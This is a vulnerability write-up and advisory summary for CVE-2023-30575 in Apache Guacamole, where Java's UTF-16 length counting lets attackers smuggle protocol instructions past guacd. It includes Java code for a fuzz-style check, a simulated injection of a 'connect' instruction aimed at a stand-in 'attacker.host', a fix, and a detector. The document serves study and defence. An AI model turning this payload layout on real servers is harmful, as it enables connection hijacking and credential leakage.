Full Report
Apache Guacamole is a remote desktop gateway server. Its architecture consists of a Java web application (guacamole-client) in front of a C backend server (guacd). The post walks through a classic parser differential between these two components that leads to serious security impact.
All communication uses the custom Guacamole protocol, a generic wrapper that abstracts RDP, VNC and SSH. Each instruction is a comma-separated list of elements terminated by a semicolon. Every element is written as LENGTH.VALUE, and the first element is the opcode, followed by its arguments. When initially connecting to a server, the handshake begins with the select instruction. Most handshake values are taken from a database, but the supported image types are directly controlled by the connecting attacker.
The documentation states that the LENGTH field is not the byte length but the number of Unicode codepoints in the UTF-8 value. Since UTF-8 handling differs between implementations, and the characters are parsed in two places (Java and C), there is likely to be a bug here. The article has a good name for this hazard: "technological variety".
To test this out, they wrote a small fuzzing harness that generates random Unicode symbols and has both the Java and the C code process them. If the results differ, there is a problem. After some fuzzing, they found that Java's length() disagreed with the C side: a single 4-byte UTF-8 character was reported by Java as having a length of 2.
Why? Since Java 9, strings use compact strings: each string is stored internally as either LATIN-1 or UTF-16, chosen dynamically. For instance, 'A' is stored as LATIN-1, while the Greek beta (β) must be stored as UTF-16. Incoming UTF-8 data containing such characters is therefore converted to UTF-16. length() is computed by shifting the internal byte array length right by the coder value: for LATIN-1 (coder 0) every character is one byte, and for UTF-16 (coder 1) the byte length is divided by 2. For 1-, 2- and 3-byte UTF-8 sequences this logic works fine, because each becomes exactly one UTF-16 code unit. However, there is a subtle issue with 4-byte UTF-8 sequences.
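The mismatch the fuzzer surfaced can be reproduced with a small differential check. This is a sketch, not the authors' harness: it runs entirely in Java and stands in for the C side with a simple UTF-8 codepoint counter (counting every byte that is not a continuation byte), which is an assumption about how a codepoint-based parser measures length. The class and method names are hypothetical.

```java
import java.nio.charset.StandardCharsets;
import java.util.Random;

public class LengthDifferential {

    // Java view: String.length() counts UTF-16 code units.
    static int javaLength(String s) {
        return s.length();
    }

    // C-style view (simulated): count UTF-8 codepoints by counting every byte
    // that is not a continuation byte (continuation bytes look like 10xxxxxx).
    static int utf8Codepoints(byte[] utf8) {
        int count = 0;
        for (byte b : utf8) {
            if ((b & 0xC0) != 0x80) {
                count++;
            }
        }
        return count;
    }

    // True when the two views disagree for the string made of this one codepoint.
    static boolean differs(int codePoint) {
        String s = new String(Character.toChars(codePoint));
        return javaLength(s) != utf8Codepoints(s.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) {
        // 'A' (1 byte), Greek beta (2 bytes), euro sign (3 bytes), U+1F600 (4 bytes)
        for (int cp : new int[] {0x41, 0x3B2, 0x20AC, 0x1F600}) {
            String s = new String(Character.toChars(cp));
            byte[] utf8 = s.getBytes(StandardCharsets.UTF_8);
            System.out.printf("U+%04X: %d UTF-8 bytes, length()=%d, codepoints=%d%n",
                    cp, utf8.length, javaLength(s), utf8Codepoints(utf8));
        }

        // Random differential check with a fixed seed: every mismatch should be
        // a supplementary-plane codepoint (>= U+10000, i.e. 4 bytes in UTF-8).
        Random rng = new Random(1);
        int mismatches = 0;
        for (int i = 0; i < 100_000; i++) {
            int cp = rng.nextInt(Character.MAX_CODE_POINT + 1);
            if (cp >= Character.MIN_SURROGATE && cp <= Character.MAX_SURROGATE) {
                continue; // lone surrogates are not valid Unicode scalar values
            }
            if (differs(cp)) {
                mismatches++;
                if (cp < Character.MIN_SUPPLEMENTARY_CODE_POINT) {
                    throw new AssertionError("unexpected BMP mismatch at U+" + Integer.toHexString(cp));
                }
            }
        }
        System.out.println(mismatches + " mismatches, all supplementary-plane");
    }
}
```

The first four lines of output show `A`, β and € (1, 2 and 3 UTF-8 bytes) with `length()=1` and one codepoint each, while U+1F600 (4 bytes) has `length()=2` but only one codepoint.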
In particular, converting a 4-byte UTF-8 sequence to UTF-16 produces a surrogate pair (two code units) rather than a single unit, and length() counts both halves. A single code point therefore reports a length of 2, because Java's length() returns the number of UTF-16 code units, not code points. Weird!
To exploit this, we have to think about how instructions are parsed. The Java side creates the instruction, then the C side parses it, in that order. The blog post has some amazing graphics for understanding this, so refer to it for the details. The idea is to send two GUAC_IMAGE parameters: one containing four 4-byte Unicode characters and another containing the payload we want to smuggle in. For the first value, the Java side writes a length of 8. However, the C side sees each of these characters as a single code point! As a result, it reads 8 code points instead of the expected 4, consuming the following comma and the length prefix of the next element. The second value is therefore where we smuggle in our input: by starting it with a semicolon followed by extra data, the remainder is interpreted as a new instruction!
What do we want to smuggle in, though? If we smuggle in the connect instruction, we control the connection parameters, including the host that guacd connects to. This can be used to leak data, such as credentials. Alternatively, RDP drive redirection can be enabled to leak world-readable files on the server.
Integrating different languages appears to be absolute hell for encoding. The post is excellent at explaining the differences between parsers and is super enjoyable for that reason. I personally don't like the text-based wire format for Guacamole, as it is prone to these types of issues. Great read!
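The smuggling step can be made concrete with a minimal simulation. It assumes a simplified handshake: the Java side frames the two GUAC_IMAGE values as arguments of one `image` instruction using `String.length()` prefixes, and guacd is modelled as a parser that counts UTF-8 codepoints. `SmuggleDemo`, the shortened `connect` arguments and `attacker.host` are hypothetical; a real `connect` instruction carries the protocol version and every parameter guacd requested in its `args` reply.

```java
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

public class SmuggleDemo {

    // Java side (vulnerable pattern): the LENGTH prefix is String.length(),
    // i.e. UTF-16 code units, so each 4-byte UTF-8 character counts as 2.
    static String encode(String... elements) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < elements.length; i++) {
            if (i > 0) sb.append(',');
            sb.append(elements[i].length()).append('.').append(elements[i]);
        }
        return sb.append(';').toString();
    }

    // C side (simulated): read LENGTH, then consume LENGTH UTF-8 codepoints,
    // where a codepoint is a lead byte followed by its continuation bytes.
    static List<List<String>> parse(byte[] in) {
        List<List<String>> instructions = new ArrayList<>();
        List<String> current = new ArrayList<>();
        int pos = 0;
        while (pos < in.length) {
            int len = 0;
            while (in[pos] != '.') {          // ASCII digits of the length prefix
                len = len * 10 + (in[pos] - '0');
                pos++;
            }
            pos++;                            // skip '.'
            int start = pos;
            for (int n = 0; n < len; n++) {
                pos++;                        // lead byte
                while (pos < in.length && (in[pos] & 0xC0) == 0x80) {
                    pos++;                    // continuation bytes
                }
            }
            current.add(new String(in, start, pos - start, StandardCharsets.UTF_8));
            byte terminator = in[pos++];
            if (terminator == ';') {          // end of instruction
                instructions.add(current);
                current = new ArrayList<>();
            } else if (terminator != ',') {
                throw new IllegalStateException("unexpected terminator at byte " + (pos - 1));
            }
        }
        return instructions;
    }

    public static void main(String[] args) {
        String fourEmoji = "\uD83D\uDE00".repeat(4);      // U+1F600 x4: 4 codepoints, length() == 8
        String smuggled = ";7.connect,13.attacker.host";  // hypothetical, simplified connect
        String wire = encode("image", fourEmoji, smuggled);
        List<List<String>> seen = parse(wire.getBytes(StandardCharsets.UTF_8));
        System.out.println(seen.size() + " instructions; second opcode: " + seen.get(1).get(0));
    }
}
```

Running `main` prints `2 instructions; second opcode: connect`. Because the four emoji add exactly four surplus codepoints, the simulated parser swallows `,27.` (the comma plus the next element's length prefix), so this particular layout needs a payload whose length has two digits.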
Analysis Summary
# Vulnerability: Apache Guacamole Parser Differential Instruction Injection
## CVE Details
- **CVE ID:** CVE-2023-30575 (Primary focus of this summary); also mentions CVE-2023-30576
- **CVSS Score:** 8.8 (High) - *Estimate based on RCE potential and low privilege requirement*
- **CWE:** CWE-436 (Interpretation Conflict), CWE-805 (Buffer Access with Incorrect Length Value)
## Affected Systems
- **Products:** Apache Guacamole (Remote Desktop Gateway)
- **Versions:** 1.5.1 and all versions prior.
- **Configurations:** Systems utilizing the Java-based web application (guacamole-client) communicating with the C-based proxy daemon (guacd).
## Vulnerability Description
The vulnerability is a **parser differential** arising from how different programming languages handle Unicode characters.
1. **The Protocol:** Guacamole uses a custom protocol in which every element of an instruction carries a length prefix giving the number of Unicode **codepoints** in its value.
2. **The Java Issue:** Java's `String.length()` returns the number of 16-bit UTF-16 **code units**, not codepoints. A 4-byte UTF-8 character lies outside the Basic Multilingual Plane and becomes a surrogate pair, so it is counted as length `2`. (With Java 9+ "Compact Strings", `length()` is derived from the internal byte array as `value.length >> coder`.)
3. **The C Issue:** The C-based backend correctly interprets the same 4-byte sequence as a single codepoint (length `1`).
4. **The Desync:** When the Java component forwards an instruction containing a 4-byte UTF-8 character, it tells the C backend to expect two characters. Because the C backend only sees one, it continues reading into the next field or instruction to satisfy the length requirement, allowing an attacker to "smuggle" and inject arbitrary Guacamole instructions into the stream.
## Exploitation
- **Status:** PoC Available (Publicly documented by Sonar Research); no known exploitation in the wild at the time of reporting.
- **Complexity:** Medium
- **Attack Vector:** Network (Low-privileged user with access to the Guacamole web interface).
## Impact
- **Confidentiality:** High (Ability to leak credentials, world-readable files via RDP drive redirection, and spy on connections).
- **Integrity:** High (Ability to inject instructions and redirect connections).
- **Availability:** Low (Potential for service disruption through malformed instructions).
- **Combined Impact:** When chained with CVE-2023-30576 (Use-After-Free), this leads to **Remote Code Execution (RCE)** on the Guacamole server.
## Remediation
### Patches
- **Apache Guacamole 1.5.2:** Released May 25, 2023. This version fixes the length calculation logic and also the separate Use-After-Free (CVE-2023-30576).
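For illustration, a length prefix that matches the protocol documentation counts codepoints, for example with `String.codePointCount`. This sketch is hypothetical and is not the actual 1.5.2 patch; it only shows a length calculation that agrees with a parser counting UTF-8 codepoints, as guacd does.

```java
import java.nio.charset.StandardCharsets;

public class CodepointEncoder {

    // Emit LENGTH.VALUE elements where LENGTH counts Unicode codepoints,
    // so a surrogate pair (one 4-byte UTF-8 character) counts once.
    static String encode(String... elements) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < elements.length; i++) {
            if (i > 0) sb.append(',');
            String e = elements[i];
            sb.append(e.codePointCount(0, e.length())).append('.').append(e);
        }
        return sb.append(';').toString();
    }

    // Cross-check against a C-style count of UTF-8 codepoints (non-continuation bytes).
    static boolean agreesWithUtf8(String element) {
        int count = 0;
        for (byte b : element.getBytes(StandardCharsets.UTF_8)) {
            if ((b & 0xC0) != 0x80) count++;
        }
        return count == element.codePointCount(0, element.length());
    }

    public static void main(String[] args) {
        String fourEmoji = "\uD83D\uDE00".repeat(4);
        System.out.println(encode("image", fourEmoji).startsWith("5.image,4.")); // true
        System.out.println(agreesWithUtf8(fourEmoji));                         // true
    }
}
```

With this encoding the four emoji from the attack get a length of `4`, so a codepoint-counting reader stops exactly at the end of the value and cannot be pushed into the next element.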
### Workarounds
- There are no direct configuration workarounds. Users must upgrade to version 1.5.2 or later.
- Restrict network access to the Guacamole interface to trusted users only.
## Detection
- **Indicators of Compromise:** Unusual connection logs showing the `connect` instruction being sent more than once within a single session handshake, or unexpected hostnames in `connect` parameters.
- **Detection Methods:** Monitor Guacamole protocol traffic for supplementary-plane characters (4 bytes in UTF-8, e.g. emojis or specific mathematical symbols) followed immediately by characters like `;` or `,` which define protocol boundaries.
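A more targeted variant of this heuristic can be sketched, assuming the monitor can see the decoded instruction stream sent to guacd: frame the stream twice, once counting UTF-16 code units (how the vulnerable Java side wrote the lengths) and once counting codepoints (how guacd reads them), and flag it when the two framings disagree. `DifferentialDetector` is hypothetical and is not a vetted detection rule.

```java
import java.util.ArrayList;
import java.util.List;

public class DifferentialDetector {

    // Frame a stream into instructions (lists of element values).
    // codepoints == true: LENGTH counts Unicode codepoints (guacd's reading).
    // codepoints == false: LENGTH counts UTF-16 code units (String.length()).
    // Returns null if the stream is malformed under that interpretation.
    static List<List<String>> frame(String s, boolean codepoints) {
        List<List<String>> instructions = new ArrayList<>();
        List<String> current = new ArrayList<>();
        int pos = 0;
        try {
            while (pos < s.length()) {
                int dot = s.indexOf('.', pos);
                int len = Integer.parseInt(s.substring(pos, dot));
                int start = dot + 1;
                int end = codepoints ? s.offsetByCodePoints(start, len) : start + len;
                current.add(s.substring(start, end));
                char terminator = s.charAt(end);
                if (terminator == ';') {
                    instructions.add(current);
                    current = new ArrayList<>();
                } else if (terminator != ',') {
                    return null;
                }
                pos = end + 1;
            }
        } catch (RuntimeException e) {
            return null; // missing '.', bad LENGTH, or value runs past the end
        }
        return current.isEmpty() ? instructions : null; // reject an unterminated instruction
    }

    // Flag streams that a String.length()-based encoder framed one way but a
    // codepoint-based parser would frame differently (or reject).
    static boolean isSuspicious(String stream) {
        List<List<String>> written = frame(stream, false);
        if (written == null) {
            return false; // cannot have come from a code-unit-based encoder
        }
        List<List<String>> read = frame(stream, true);
        return read == null || !read.equals(written);
    }

    public static void main(String[] args) {
        String emoji4 = "\uD83D\uDE00".repeat(4);
        String attack = "5.image,8." + emoji4 + ",27.;7.connect,13.attacker.host;";
        System.out.println(isSuspicious(attack));                 // true
        System.out.println(isSuspicious("5.image,9.image/png;")); // false
    }
}
```

Streams framed with correct codepoint lengths fail the code-unit framing as soon as they contain a supplementary character, so they are not flagged; only streams whose two framings diverge are reported.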
## References
- **Vendor Advisory:** hxxps://guacamole[.]apache[.]org/security/#fixed-in-apache-guacamole-152
- **Detailed Research:** hxxps://www[.]sonarsource[.]com/blog/code-interoperability-the-hazards-of-technological-variety/
- **CVE Mitre:** hxxps://cve[.]mitre[.]org/cgi-bin/cvename[.]cgi?name=CVE-2023-30575